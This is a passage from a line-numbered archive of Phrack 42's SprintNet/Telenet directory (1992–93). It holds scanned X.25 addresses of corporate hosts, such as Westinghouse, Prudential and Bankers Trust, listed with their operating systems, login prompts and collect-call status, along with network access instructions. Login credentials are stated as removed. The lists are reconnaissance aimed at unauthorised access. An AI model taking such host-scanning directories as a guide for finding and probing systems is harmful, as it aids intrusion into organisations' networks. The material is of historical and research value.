  5196. 422 496                Westinghouse ESCC    IBM C-80 System B Access
  5197. 422 497                Westinghouse ESCC    IBM C-80 System A Access
  5198. 422 501    AOS 
  5199. 422 502    TSO         pci protocol converter    please logon pad 502
  5200. 422 504.9              ESCC CCU PAD 504  - PLEASE ENTER PASSWORD  
  5201. 422 508                Westinghouse Power Generation World Headquarters
  5202. 422 511    AOS 
  5203. 422 514    AOS 
  5204. 422 517    AOS 
  5205. 422 519                Westinghouse X.25 Network   Lima, OH pad 422519
  5206. 422 522    AOS
  5207. 422 525    AOS
  5208. 422 527    AOS         Nuclear Saftey
  5209. 422 535    AOS
  5210. 422 539    AOS
  5211. 422 541    AOS
  5212. 422 544.2              RM > 
  5213. 422 545    AOS
  5214. 422 547    VAX/VMS     
  5215. 422 555    AOS
  5216. 422 558                Westinghouse X.25 Network    Orrville, OH pad p558
  5217. 422 559    AOS
  5218. 422 571    AOS
  5219. 422 577    AOS
  5220. 422 609    AOS
  5221. 422 601    Unix/SunOS
  5222. 422 602    AOS
  5223. 422 606                Carpenter Technology's Network  
  5224. 422 608    AOS
  5225. 422 609    AOS
  5226. 422 613    AOS
  5227. 422 614 
  5228. 422 616    AOS
  5229. 422 623    AOS
  5230. 422 631    AOS
  5231. 422 66                Wesmark System
  5232. 422 637    AOS
  5233. 422 645    AOS
  5234. 422 649    AOS
  5235. 422 651    AOS
  5236. 422 656                Wesmark System
  5237. 422 657    AOS
  5238. 422 659    AOS
  5239. 422 660    AOS
  5240. 422 669    AOS
  5241. 422 674    AOS
  5242. 422 694                IBM 7171 Access   please hit the ENTER key
  5243. 422 695                Westinghouse ESCC   IBM C-80 System G Access
  5244. 422 696                Westinghouse ESCC   IBM C-80 System F Access
  5245. 422 697                Westinghouse ESCC   IBM C-80 System E Access
  5246. 422 698                Westinghouse ESCC   IBM C-80 System D Access
  5247. 422 702                (garbage)
  5248. 422 999                WCCS Figures Service
  5249. 422 1200.99            Username: 
  5250. 422 1205               ****POSSIBLE DATA LOSS 00 00****
  5251. 422 1207               password: 
  5252. 422 1208.1             Westinghouse X.25 Network  BALTIMORE, MD.
  5253. 422 1215 
  5254. 422 1305   AOS
  5255. 422 1304.1             Westinghouse X.25 Network  Ft. Payne, AL pad 1304a
  5256. 422 1305   AOS
  5257. 422 1312.1             Westinghouse X.25 Network  Winston-Salem, NC pad 1312-1
  5258. 422 1317   AOS
  5259. 422 1319
  5260. 422 1320   AOS
  5261. 422 1322   AOS
  5262. 422 1396   VAX/VMS
  5263. 422 1398   VAX/VMS
  5264. 422 1405 
  5265. 422 1420   VAX/VMS     COFVIL - APTUS Coffeyville system
  5266. 422 1512               Please enter service name >   (use 'wespac')
  5267. 422 1720 
  5268. 422 1719 
  5269. 422 1720 
  5270. 422 1722               (menu driven...)
  5271. 422 1724 
  5272. 422 1759               (menu driven...)
  5273. 422 1760 
  5274. 422 1791 
  5275. 422 1792
  5276. 422 1793 
  5277. 422 1794 
  5278. 422 1840.2 Prime       Primecom Network 19.4Q.111 System 47
  5279. 422 1852               Knutsford PAD 1
  5280. 422 1855               Stansted Delta PAD  Operator:
  5281. 422 1860.1
  5282. 422 1862
  5283. 422 1884.1             >
  5284. 422 1890.1             London, UK PAD 4221890
  5285. 422 1901.2 $           Westinghouse EURO.SWITCH.NETWORK - WNI -BRUSSEL
  5286. 422 1907   $           WESPAC PAD 4
  5287. 422 1917   $           WESPAC PAD 3
  5288. 422 3101.1             Class of Service: 
  5289. 422 3201   AOS
  5290. 422 3202   AOS
  5291. 422 3203   AOS
  5292. 422 3204   AOS
  5293. 422 3208 
  5294. 422 3209 
  5295. 422 3210 
  5296. 422 3211 
  5297. 422 3212 
  5298. 422 3213   AOS
  5299. 422 3214               SmartView NetWork Management System
  5300. 422 3219   AOS
  5301. 422 3221   AOS
  5302. 422 3222 
  5303. 422 3223 
  5304. 422 3228   AOS
  5305. 422 3230 
  5306. 422 3231
  5307. 422 3233.1
  5308. 422 3234 
  5309. 422 3235   AOS
  5310. 422 3236               VISTA BATCH    User ID?
  5311. 422 3252   AOS
  5312. 422 3253   AOS
  5313. 422 3254   AOS
  5314. 422 3255   AOS
  5315. 422 3258 
  5316. 422 3259 
  5317. 422 3260
  5318. 422 3261
  5319. 422 3361 
  5320. 422 3362 
  5321. 422 3363 
  5322. 422 3401   TSO         MIS Computer Centre
  5323. 422 3403   Port Select MIS Computer Center
  5324. 422 3503   VAX/VMS     
  5325. 422 3601               Westinghouse X.25 Network  O' Hara Site pad 4223601
  5326. 422 3602   VAX/VMS
  5327. 422 3701   VAX/VMS
  5328. 422 3703   CDCNET      2 systems: SN211=CRAY, NOSF=Cyber
  5329. 422 3704   CDCNET 
  5330. 422 3705   CDCNET
  5331. 422 3753 
  5332. 422 3804
  5333. 422 3805
  5334. 422 3806
  5335. 422 3807 
  5336. 422 3842.1             Jones Day Washington Office
  5337. 422 3860.2             Jones Day Pittsburgh Office
  5338. 422 3902               enter class 
  5339. 422 3904   VAX/VMS
  5340. 422 5021
  5341. 422 5039 
  5342. 422 5037               connected 31104220503700/
  5343. 422 5043 
  5344. 422 5044
  5345. 422 5052   VAX/VMS
  5346. 422 5053   VAX/VMS
  5347. 422 5060
  5348. 422 5082
  5349. 422 6002 
  5350. 422 6011 
  5351.  
  5352. 501  -  Arkansas  Scanned: [0 - 300]      
  5353.  
  5354. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  5355. ---------- ----------- ------------------------------------------------- 
  5356. 501 130  *
  5357. 501 131  *
  5358. 501 133 
  5359.  
  5360.  
  5361.  
  5362.  
  5363. 502  -  Kentucky  Scanned: [0 - 300]      
  5364.  
  5365. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  5366. ---------- ----------- ------------------------------------------------- 
  5367. 502 74     VAX/VMS     Username: 
  5368. 502 75     VAX/VMS     Username: 
  5369. 502 130    ???         B&W Corporate Computer System
  5370. 502 136                CONNECTED TO PACKET/94
  5371. 502 138  *
  5372.  
  5373.  
  5374.  
  5375.  
  5376. 503  -  Oregon  Scanned: [0 - 500]      
  5377.  
  5378. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  5379. ---------- ----------- ------------------------------------------------- 
  5380. 503 20   $             outdial (503)
  5381. 503 21   $             outdial (503)
  5382. 503 33     Major BBS   Public Data Network   User-ID? new  
  5383. 503 120  $             outdial (503)
  5384. 503 378  *
  5385. 503 379  *
  5386. 503 476  $             access barred
  5387. 503 477  *
  5388. 503 530  *
  5389. 503 531  *
  5390.  
  5391.  
  5392.  
  5393.  
  5394. 505  -  New Mexico  Scanned: [0 - 300]      
  5395.  
  5396. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  5397. ---------- ----------- ------------------------------------------------- 
  5398. 505 30 
  5399. 505 153  *
  5400. 505 157  *
  5401. 505 159  *
  5402. 505 233  $             REQUESTED APPLICATION NOT DEFINED 
  5403.  
  5404.  
  5405.  
  5406.  
  5407. 509  -  Washington  Scanned: [0 - 300]      
  5408.  
  5409. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  5410. ---------- ----------- ------------------------------------------------- 
  5411. 509 232  $
  5412.  
  5413.  
  5414.  
  5415.  
  5416. 512  -  Texas  Scanned: [0 - 300]      
  5417.  
  5418. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  5419. ---------- ----------- ------------------------------------------------- 
  5420. 512 8    $             outdial (512)
  5421. 512 55   *
  5422. 512 63   *
  5423. 512 65   *
  5424. 512 136                AL /,/-   (locks up)
  5425. 512 138  *
  5426. 512 140                AL /,/-   (locks up)
  5427. 512 151  *
  5428. 512 152  *
  5429. 512 153  *
  5430. 512 253  *
  5431. 512 257    Unix        HP-UX ioi877 
  5432. 512 260  *
  5433. 512 330 
  5434. 512 331 
  5435.  
  5436.  
  5437.  
  5438.  
  5439. 513  -  Ohio  Scanned: [0 - 300+]      
  5440.  
  5441. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  5442. ---------- ----------- ------------------------------------------------- 
  5443. 513 30                 Lexis and Nexis
  5444. 513 31     Port Selec  MEADNET (hosts:lexis,tymnet,telenet,dialcom...)
  5445. 513 32   $             $$ 5800 LOGIN SUCCESSFUL  
  5446. 513 37   $ Prime       PRIMENET 23.3.0.r29 E03 
  5447. 513 55   $ Prime       PRIMENET 22.1.4.R30 I01
  5448. 513 57   $ Prime       PRIMENET 23.3.0.r29 E04  
  5449. 513 58   $ VAX/VMS     AEE040 is a MicroVAX 3900 
  5450. 513 66   *
  5451. 513 67   $ Prime       PRIMENET 23.3.0.r29 E01
  5452. 513 68   *
  5453. 513 69   *
  5454. 513 72   $ Prime       PRIMENET 22.1.4.R30 O1
  5455. 513 73   $ Prime       PRIMENET 22.1.4.R30 S2  
  5456. 513 75   $ Prime       PRIMENET 22.1.4.R30 T01
  5457. 513 77   $ Prime       PRIMENET 23.3.0.r29 M01
  5458. 513 78   $ Prime       PRIMENET 22.1.4.R7 A02  
  5459. 513 79   $ Prime       PRIMENET 22.1.4.R30 C2  
  5460. 513 80                 Welcome To Develnet --CL2-- Request:
  5461. 513 131                Lexis and Nexis
  5462. 513 132                Lexis and Nexis
  5463. 513 133                Lexis and Nexis
  5464. 513 134                Lexis and Nexis
  5465. 513 139                Lexis and Nexis (passthru 202365)
  5466. 513 161     VAX/VMS    AEE101
  5467. 513 165     VAX/VMS    AEE010
  5468. 513 174   *
  5469. 513 176   *
  5470. 513 230     VAX/VMS    Unison/Applied Software Designs, Inc.
  5471. 513 234   $ VAX/VMS    Continental PET Technologies, FLORENCE 
  5472. 513 236   *
  5473. 513 240   *
  5474.  
  5475.  
  5476.  
  5477.  
  5478. 515  -  Iowa  Scanned: [0 - 200]      
  5479.  
  5480. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  5481. ---------- ----------- ------------------------------------------------- 
  5482. 515 30                 Lexis and Nexis
  5483. 515 31                 Lexis and Nexis
  5484. 515 47   *
  5485.  
  5486.  
  5487.  
  5488.  
  5489. 516  -  New York  Scanned: [0 - 300]     
  5490.  
  5491. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  5492. ---------- ----------- ------------------------------------------------- 
  5493. 516 14   $             outdial (516)
  5494. 516 15   $             outdial (516)
  5495. 516 35                 CCI Multilink Services, (mail)
  5496. 516 38   *
  5497. 516 45                 Hello
  5498. 516 48.1               CUSTOMER ID:
  5499. 516 49.1               CUSTOMER ID: 
  5500. 516 140  *
  5501. 516 234  *
  5502.  
  5503.  
  5504.  
  5505.  
  5506. 518  -  New York  Scanned:[0 - 300]     
  5507.  
  5508. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  5509. ---------- ----------- ------------------------------------------------- 
  5510. 518 30                 MHP201A UPK12X01 APPLICATION: 
  5511. 518 36                 MHP201A UPK12X01 APPLICATION: 
  5512. 518 230                MHP201A UPK12X01 APPLICATION: 
  5513. 518 231                MHP201A UPK12X01 APPLICATION:
  5514.  
  5515.  
  5516.  
  5517.  
  5518. Date:     Wed Mar 24, 1993  8:16 am  PST
  5519. From:     phrack
  5520.           EMS: INTERNET / MCI ID: 376-5414
  5521.           MBX: phrack@stormking.com
  5522.  
  5523. TO:       Thomas J. Klotzbach / MCI ID: 375-1365
  5524. TO:       Proctor & Associates / MCI ID: 399-1080
  5525. TO:       Peter Nesbitt / MCI ID: 511-1312
  5526. TO:     * Berton Corson / MCI ID: 528-0397
  5527. TO:       Michael W. Carroll / MCI ID: 557-1860
  5528. TO:       Michael McMahon / MCI ID: 585-7625
  5529. TO:       Multiple recipients of list
  5530.           EMS: INTERNET / MCI ID: 376-5414
  5531.           MBX: phrack@stormking.com
  5532. Subject:  Phrack 42/8-14
  5533.  
  5534.                              ==Phrack Magazine==
  5535.  
  5536.                   Volume Four, Issue Forty-Two, File 8 of 14
  5537.  
  5538.                         The SprintNet/Telenet Directory
  5539.  
  5540.                                       ===
  5541.                                     =======
  5542.                                   ===========
  5543.                                 ===============
  5544.                            ---------------------===========
  5545.                         ------------------=============
  5546.                      ---------------=================
  5547.                   ------------===================
  5548.                                 ===============
  5549.                                   ===========
  5550.                                     =======
  5551.                                       ===
  5552.  
  5553.  
  5554.  
  5555. Scanned and written by Skylar
  5556. Release date:  12/92
  5557.  
  5558. Part I   Basic SprintNet Info
  5559. Part II  SprintNet Directory
  5560.  
  5561.  
  5562.  
  5563.  
  5564. How to Access SprintNet:
  5565. ~~~~~~~~~~~~~~~~~~~~~~~~
  5566. (Compliments of Sprint)
  5567.  
  5568.  
  5569.                          SPRINTNET LOCAL ACCESS NUMBERS
  5570.  
  5571.      FOR THE MOST UP-TO-DATE LISTING OF THE U.S. ACCESS TELEPHONE NUMBERS
  5572.      FOR PC OUTDIAL SERVICES, DO THE FOLLOWING:
  5573.  
  5574.      1.  USE A MODEM TO DIAL 1-800-546-1000 WITH PARAMETERS SET AT 7-E-1
  5575.  
  5576.      2.  TYPE THREE CARRIAGE RETURNS (CR) (CR) (CR)
  5577.  
  5578.      3.  INPUT YOUR AREA CODE AND LOCAL EXCHANGE
  5579.  
  5580.      4.  YOU WILL THEN RECEIVE THE PROMPT  SIGN "@"
  5581.  
  5582.      5.  THEN, TYPE:
  5583.                     MAIL (CR)
  5584.                     USER NAME: PHONES (CR)
  5585.                     PASSWORD: PHONES  (CR)
  5586.  
  5587. Follow the menus to get your local dialup, then logon through that using the
  5588. same procedure until you get to the "@" prompt.  From here, you can type in
  5589. commands.  Below is a list of commands available from the "@" prompt.
  5590.  
  5591. Notes:  while connected, you can escape to the command prompt by sending
  5592.         <cr>@<cr>
  5593.         while waiting for a connection, you can escape to the command prompt by
  5594.         sending a hard BREAK
  5595.  
  5596. Command <parameter>  Explanation
  5597.  
  5598. BYE                  Closes session (same as disconnect)
  5599. CONNECT <nua>        Connects to a network user address
  5600. CONTINUE             Continue session (used after breaking)
  5601. DISCONNECT           Closes session (same as bye)
  5602. DTAPE                Builds optimum circuit for bulk file transfer
  5603. DISABLE ECHO
  5604. DISABLE FLOW         Pad to host flow control
  5605. DISABLE TFLOW        Terminal to pad flow control
  5606. ENABLE ECHO
  5607. ENABLE FLOW
  5608. ENABLE TFLOW
  5609. FULL                 Set full duplex
  5610. HALF                 Set half duplex
  5611. HANGUP               Self explanitory
  5612. ID <nui>             Sets the network user id for charged calls
  5613. RESET                Resets your port (as if you just dialed up)
  5614. RST                  Show remote parameters
  5615. RST?                 Set remote parameters
  5616. PAR?                 Show ITI parameters
  5617. STATUS               Shows your current network address and port
  5618. SET? <param>:<value> Set ITI parameters. 
  5619. TERM <termtype>      Set your termtype 
  5620. TEST CHAR            Test of all ascii characters
  5621. TEST ECHO            Echos what you type
  5622. TEST TRIANGLE        
  5623. TEST VERSION         Shows current pad software ver
  5624.  
  5625. Note:  I didn't include any of the parameters for SET? or termtypes because
  5626.        they would have increased the length of this file by about 20%.  If you
  5627.        want these, you can get them from the PC-PURSUIT BBS file section via
  5628.        C PURSUIT from SprintNet or 031109090063100 international.
  5629.  
  5630.  
  5631.  
  5632. Network Messages:
  5633. ~~~~~~~~~~~~~~~~~
  5634. While attempting to CONNECT to addresses on SprintNet, you may run into various
  5635. messages from the network.  This should help you determine what they mean.
  5636.  
  5637.  
  5638. If you are connected and break your connection or are disconnected by the
  5639. remote host, you will recieve a disconnect message.  Below is a breakdown of
  5640. the message.
  5641.  
  5642. DISCONNECTED 00 00 00:00:00:00 000 00
  5643.              ^  ^  ^_________^  ^  ^
  5644.              |  |       |       |  |
  5645.              |  |       |       |  +-- Packets sent
  5646.              |  |       |       +----- Packets recieved
  5647.              |  |       +------------- Days:Hours:Minutes:Seconds connected
  5648.              |  +--------------------- Clearing diagnostic code
  5649.              +------------------------ Clearing cause code
  5650.    
  5651.  
  5652. If you are unable to make a connection or abort an attempted connection, you
  5653. will only receive cause and diagnostic codes (as no time was spent connected
  5654. and obviously no packets were sent!) along with a very general plain-text of
  5655. what the problem might be (i.e. rejecting, not operating...).  Below is a list
  5656. of cause and diagnostic codes to give you a more detailed idea of why you were
  5657. unable to connect or why you were disconnected.
  5658.  
  5659.  
  5660.   Clear cause codes:
  5661.  
  5662.  0   "DTE originated clear"
  5663.  1   "Number busy"
  5664.  3   "Invalid facility requested"
  5665.  5   "Network congestion"
  5666.  9   "Out of Order"
  5667.  11  "Access barred"
  5668.  13  "Not obtainable"
  5669.  17  "Remote Procedure Error"
  5670.  19  "Local Procedure error"
  5671.  21  "RPOA out of order"
  5672.  25  "Reverse Charge not Subscribed to"
  5673.  33  "Incompatible destination"
  5674.  41  "Fast Select acceptance not subscribed"
  5675.  49  "Ship absent"
  5676.  128 "DTE originated clear with top bit set"
  5677.  193 "Gateway procedural error"
  5678.  195 "Gateway congestion"
  5679.  199 "Gateway Operational"
  5680.  
  5681.  
  5682.  Clear diagnostic codes
  5683.  
  5684.  0   "No additional Information"
  5685.  1   "Invalid Ps"
  5686.  2   "Invalid Pr"
  5687.  16  "Packet Type Invalid"
  5688.  17  "Packet Type Invalid in state r1"
  5689.  18  "Packet Type Invalid in state r2"
  5690.  19  "Packet Type Invalid in state r3"
  5691.  20  "Packet Type Invalid in state p1"
  5692.  21  "Packet Type Invalid in state p2"
  5693.  22  "Packet Type Invalid in state p3"
  5694.  23  "Packet Type Invalid in state p4"
  5695.  24  "Packet Type Invalid in state p5"
  5696.  25  "Packet Type Invalid in state p6"
  5697.  26  "Packet Type Invalid in state p7"
  5698.  27  "Packet Type Invalid in state d1"
  5699.  28  "Packet Type Invalid in state d2"
  5700.  29  "Packet Type Invalid in state d3"
  5701.  32  "Packet not allowed"
  5702.  33  "Packet Type Unidentifiable"
  5703.  34  "Call on One way LC"
  5704.  35  "Invalid PVC packet type"
  5705.  36  "Packet on Unassigned logical channel"
  5706.  37  "Reject not Subscribed to"
  5707.  38  "Packet too short"
  5708.  39  "Packet too long"
  5709.  40  "Invalid GFI"
  5710.  41  "Restart/Registration Packet has LC"
  5711.  42  "Packet type not compatible with Facility"
  5712.  43  "Unauthorised Interrupt Confirmation"
  5713.  44  "Unauthorised Interrupt"
  5714.  45  "Unauthorised Reject"
  5715.  48  "Timer expired"
  5716.  49  "Timer expired for Incoming call"
  5717.  50  "Timer expired for clear Indication"
  5718.  51  "Timer expired for reset indication"
  5719.  52  "Timer expired for restart indication"
  5720.  53  "Timer expired for call forwarding"
  5721.  64  "Call set up/clear/registration problem"
  5722.  65  "Facility/registration code not allowed"
  5723.  66  "Facility parameter not allowed"
  5724.  67  "Invalid Called Address"
  5725.  68  "Invalid calling address"
  5726.  69  "Invalid facility registration length"
  5727.  70  "Incoming call barred"
  5728.  71  "No logical channel available"
  5729.  72  "Call Collision"
  5730.  73  "Duplicate facility ested"
  5731.  74  "Non zero address length"
  5732.  75  "Non zero facility length"
  5733.  76  "Facility not provided when expected"
  5734.  77  "Invalid CCITT spec'd facility"
  5735.  78  "Maximum call redirections/forwardings exceeded"
  5736.  80  "Miscellaneous"
  5737.  81  "Improper cause code from DTE"
  5738.  82  "Non alligned octet"
  5739.  83  "Inconsistent Q bit setting"
  5740.  84  "NUI Related problem"
  5741.  96  "International setup/clearing problem"
  5742.  97  "Unknown calling DNIC "
  5743.  98  "TNIC mismatch "
  5744.  99  "Call identifier mismatch"
  5745.  100 "Neg' error in utility parm' value"
  5746.  101 "Invalid utility length "
  5747.  102 "Non-zero utility length "
  5748.  103 "M bit violation "
  5749.  112 "International problem "
  5750.  113 "Remote Network problem "
  5751.  114 "International Protocol problem "
  5752.  115 "International Link out of order "
  5753.  116 "International Link busy"
  5754.  117 "Transit Network Facility Problem"
  5755.  118 "Remote Network Facility Problem"
  5756.  119 "International routing problem"
  5757.  120 "Temporary routing problem"
  5758.  121 "Unknown called DNIC"
  5759.  122 "MAintenance action"
  5760.  128 "Network Specific Diagnostic"
  5761.  218 "trax_trap error for user call"
  5762.  219 "user task error"
  5763.  220 "x25 task error"
  5764.  
  5765.             
  5766. Note:  If you're getting LOCAL/REMOTE PROCEDURE ERROR or REJECTING, try using
  5767.        different ports with the same address.
  5768.  
  5769.  
  5770. Other Than SprintNet:
  5771. ~~~~~~~~~~~~~~~~~~~~~
  5772. International or other than SprintNet users, follow the table below to expand
  5773. these addresses to suit your network:
  5774.  
  5775.       202  224      <--- Address from list  
  5776.  
  5777.  031102020022400    <--- Translated to international format      
  5778.  
  5779.  
  5780. 03110 202 00224 00  <--- Explanation of international format  
  5781. ^^^^^ ^^^ ^^^^^ ^^
  5782.   |    |    |    |
  5783.   |    |    |    |____ Port Number
  5784.   |    |    |_________ Network Address
  5785.   |    |______________ Network Prefix
  5786.   |___________________ DNIC
  5787.  
  5788.  
  5789.  
  5790.  DNIC  : This will be be 03110 for all translations.  On some networks, you
  5791.          won't need the leading 0 and can use 3110, and a few networks
  5792.          (DataPac?) use a 1 instead of 0, thus:  13110.
  5793.  
  5794.  
  5795. Prefix : Throughout this file, it will always be a three digit prefix.
  5796.          
  5797.  
  5798. Address: You may have to experiment a little to get the correct place holders,
  5799.          but as a general rule they will translate like this:
  5800.  
  5801.              1  = 00001
  5802.             11  = 00011
  5803.            111  = 00111
  5804.           1111  = 01111          
  5805.          11111  = 11111
  5806.          
  5807.  
  5808. Ports  : Port numbers range from .1 to .99.  The first 27 ports may be
  5809.          alternately displayed as A-Z.  Ports are generally not listed as most
  5810.          addresses will find a free port for you if you leave it off, but in
  5811.          some cases you must use it, so they translate like this:
  5812.  
  5813.          .1 or A = 01
  5814.          .2 or B = 02
  5815.          and so on...
  5816.  
  5817.  
  5818.  
  5819. Examples of translated addresses:
  5820.       
  5821.       201 1.5  = 031102010000105     
  5822.       415 9    = 031104150000900
  5823.       223 25   = 031102230002500
  5824.       714 218  = 031107140021800
  5825.       617 2027 = 031106170202700
  5826.  
  5827.  
  5828. If this seems a bit essoteric or confusing, don't worry.  A little bit of
  5829. experimenting will get you on the right track.
  5830.  
  5831.  
  5832. Notes: 
  5833. ~~~~~~
  5834. - You can usually omit leading and trailing 0's 
  5835. - Most networks and PADs do NOT allow any spaces
  5836. - From SprintNet, you can use either form of address
  5837.  
  5838.  
  5839.  
  5840. Conventions in this list: 
  5841. ~~~~~~~~~~~~~~~~~~~~~~~~~
  5842. Addresses followed by a "$" do not accept collect connections (if you're not
  5843. coming on from SprintNet, ignore the $).
  5844.  
  5845. Addresses followed by a "*" do not accept collect connections, and I was unable
  5846. to connect to them to determine what they are.
  5847.                                                                                 
  5848. When both the OS and the RESPONSE fields are left blank, this means that I
  5849. connected and either couldn't evoke response or got a garbage response.
  5850.   
  5851. LOGIN/PW's removed from this release.
  5852.  
  5853.  
  5854.  
  5855.                               SprintNet Directory
  5856.                               ~~~~~~~~~~~~~~~~~~~
  5857.  
  5858. 201 - New Jersey  Scanned:[0-2000]      
  5859.  
  5860. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  5861. ---------- ----------- -------------------------------------------------
  5862. 201 1    $             outdial (201)
  5863. 201 22   $             outdial (201)
  5864. 201 25     Unix        HP-UX ciathp A.B7.00 U 9000/835
  5865. 201 30 
  5866. 201 32                 D&B Terminal
  5867. 201 34   $ Prime
  5868. 201 36   *             (incoming call barred) 
  5869. 201 37   $
  5870. 201 40   $             Welcome to our PSI via X.29 
  5871. 201 42   *
  5872. 201 43   $
  5873. 201 44   $
  5874. 201 45     Prime       NewsNet
  5875. 201 46   $
  5876. 201 48   $ VAX/VMS     Welcome to MicroVMS V5.3
  5877. 201 49   $ VAX/VMS
  5878. 201 53                 WELCOME TO COLGATE'S IICS
  5879. 201 57   *             (incoming call barred)
  5880. 201 58   *             (incoming call barred)
  5881. 201 59   *             (incoming call barred)
  5882. 201 66   $ Prime
  5883. 201 67                 warner computer systems
  5884. 201 68                 warner computer systems 
  5885. 201 69                 warner computer systems 
  5886. 201 83                 ENTER ID:
  5887. 201 84                 D&B Terminal
  5888. 201 86                 D&B Terminal
  5889. 201 88                 D&B Terminal
  5890. 201 89                 Prudential
  5891. 201 107  $             outdial (201)
  5892. 201 108  $             outdial (201)
  5893. 201 138    HP-3000     EXPECTED HELLO, :JOB, :DATA, OR (CMD) AS LOGON.
  5894. 201 140  $             Enter One Time Password: 
  5895. 201 156    Unix        Securities Data Company (SDC7) 
  5896. 201 163                VU/TEXT * PLEASE SIGN ON: 
  5897. 201 164                VU/TEXT * PLEASE SIGN ON:
  5898. 201 167    DTC         DTC01.HP.COM
  5899. 201 170                Prudential
  5900. 201 173                MHP201A UPK19130 APPLICATION:
  5901. 201 174    CRYPTO      ENTER "IDX" OR "ID" AND USER ID -->
  5902. 201 179                APPLICATION: 
  5903. 201 200                D&B Terminal
  5904. 201 201                D&B Terminal
  5905. 201 235  *
  5906. 201 241  $             (immediate hangup)
  5907. 201 242                D&B Terminal
  5908. 201 243                D&B Terminal
  5909. 201 244                D&B Terminal
  5910. 201 246                D&B Terminal
  5911. 201 247    VTAM        Shearson Lehman Brothers NPSI 
  5912. 201 252    Prime       PRIMENET 21.0.6 BOR 
  5913. 201 254  $ Unix        field login:                                 
  5914. 201 257                Please press <Return> . . .(
  5915. 201 259                Please press <Return> . . .(
  5916. 201 271  $             User Access Verification   Password:
  5917. 201 301  $             outdial
  5918. 201 334  $ HP-3000     :
  5919. 201 335  *
  5920. 201 336  $             Concurrent Computer Corporation's DATALINK
  5921. 201 337  $             out of order
  5922. 201 339  $ ???         (echo)
  5923. 201 340  *
  5924. 201 341  *
  5925. 201 342  $ Unix        ocpt
  5926. 201 343  $             Enviornmental Control Monitor (PENNET)
  5927. 201 344  *
  5928. 201 348  *
  5929. 201 350  $             $$ 4200 MODEL: $$ 50 DEVICE TYPE IDENTIFIER :
  5930. 201 355  $             Concurrent Computer Corporation's DATALINK
  5931. 201 430  *             (incoming call barred)
  5932. 201 465    VAX/VMS     V5.5      on VBH301
  5933. 201 471                Prudential
  5934. 201 472                APPLICATION: 
  5935. 201 474                Prudential
  5936. 201 475                Prudential
  5937. 201 477    VM/CMS?     ENTER AS SHOWN: L/LOGON/TSO/INFO/CICS
  5938. 201 479    VM/CMS
  5939. 201 730  *
  5940. 201 770  *
  5941. 201 830  $             INSCI/90 SYSTEM MV-10/13, LOGON PLEASE
  5942. 201 870  $             INSCI/90 SYSTEM MV-10/13, LOGON PLEASE
  5943. 201 890  $             INSCI/90 SYSTEM MV-10/13, LOGON PLEASE
  5944. 201 895  $             INSCI/90 SYSTEM MV-10/10, LOGON PLEASE
  5945. 201 899  $             (hangs up)
  5946. 201 910  $             (echo)
  5947. 201 912  $             (echo)
  5948. 201 914  $             (echo)
  5949. 201 916  $             (echo)
  5950. 201 950                Bankers Trust Online
  5951. 201 999  $             (hangs up)
  5952. 201 1030               USER ID 
  5953. 201 1050               VU/TEXT 
  5954. 201 1051               VU/TEXT
  5955. 201 1052               VU/TEXT
  5956. 201 1053               VU/TEXT
  5957. 201 1054               VU/TEXT
  5958. 201 1055               VU/TEXT
  5959. 201 1056               VU/TEXT 
  5960. 201 1057               VU/TEXT
  5961. 201 1059               VU/TEXT
  5962. 201 1060               VU/TEXT
  5963. 201 1061               VU/TEXT
  5964. 201 1062               VU/TEXT
  5965. 201 1063               VU/TEXT
  5966. 201 1064               VU/TEXT
  5967. 201 1065               VU/TEXT 
  5968. 201 1066               VU/TEXT
  5969. 201 1067               VU/TEXT
  5970. 201 1068               VU/TEXT
  5971. 201 1069               VU/TEXT
  5972. 201 1070               VU/TEXT
  5973. 201 1071               VU/TEXT
  5974. 201 1072               VU/TEXT
  5975. 201 1073               VU/TEXT
  5976. 201 1074               VU/TEXT
  5977. 201 1075               VU/TEXT 
  5978. 201 1076               VU/TEXT 
  5979. 201 1077               VU/TEXT 
  5980. 201 1078               VU/TEXT
  5981. 201 1079               VU/TEXT 
  5982. 201 1135 $             ACCESS BARRED
  5983. 201 1137 $             Finlay Fine Jewelry Corp. 
  5984. 201 1139               CONNECTED TO PACKET/400
  5985. 201 1143 $             MHP201A UPK19040  APPLICATION:
  5986. 201 1156 *
  5987. 201 1160               Shaw Data Services
  5988. 201 1163 *             (incoming call barred)
  5989. 201 1164 *             (incoming call barred)
  5990. 201 1168               CONNECTED TO PACKET/400
  5991. 201 1170.1 $           Johnson and Johnson Network
  5992. 201 1171 *
  5993. 201 1172 $ Unix/SCO    TCSS
  5994. 201 1173 *
  5995. 201 1174 *
  5996. 201 1176               NSP READY
  5997. 201 1177               NSP READY
  5998. 201 1232   VAX/VMS     Username: 
  5999. 201 1233   VAX/VMS     Username: 
  6000. 201 1243   VAX/VMS     Friden Neopost  (NJCRAN Node)
  6001. 201 1251   VM/CMS      GSERV
  6002. 201 1258   VM/CMS      GSERV
  6003. 201 1259   VM/CMS      GSERV
  6004. 201 1263 *             (incoming call barred)
  6005. 201 1264 *             (incoming call barred)
  6006. 201 1265 *
  6007. 201 1266 *
  6008. 201 1267 *
  6009. 201 1268 *
  6010. 201 1270 
  6011. 201 1272 
  6012. 201 1275   VAX/VMS     Shaw Data Services
  6013. 201 1277
  6014. 201 1330 *
  6015. 201 1331 *
  6016. 201 1332 *
  6017. 201 1333 $             (echo)
  6018. 201 1335 $             Environment Control Monitor 
  6019. 201 1340 *
  6020. 201 1341 *
  6021. 201 1342 *
  6022. 201 1343               Prudential
  6023. 201 1344               Prudential
  6024. 201 1345               Prudential
  6025. 201 1346               Prudential
  6026. 201 1347               Prudential
  6027. 201 1354 *
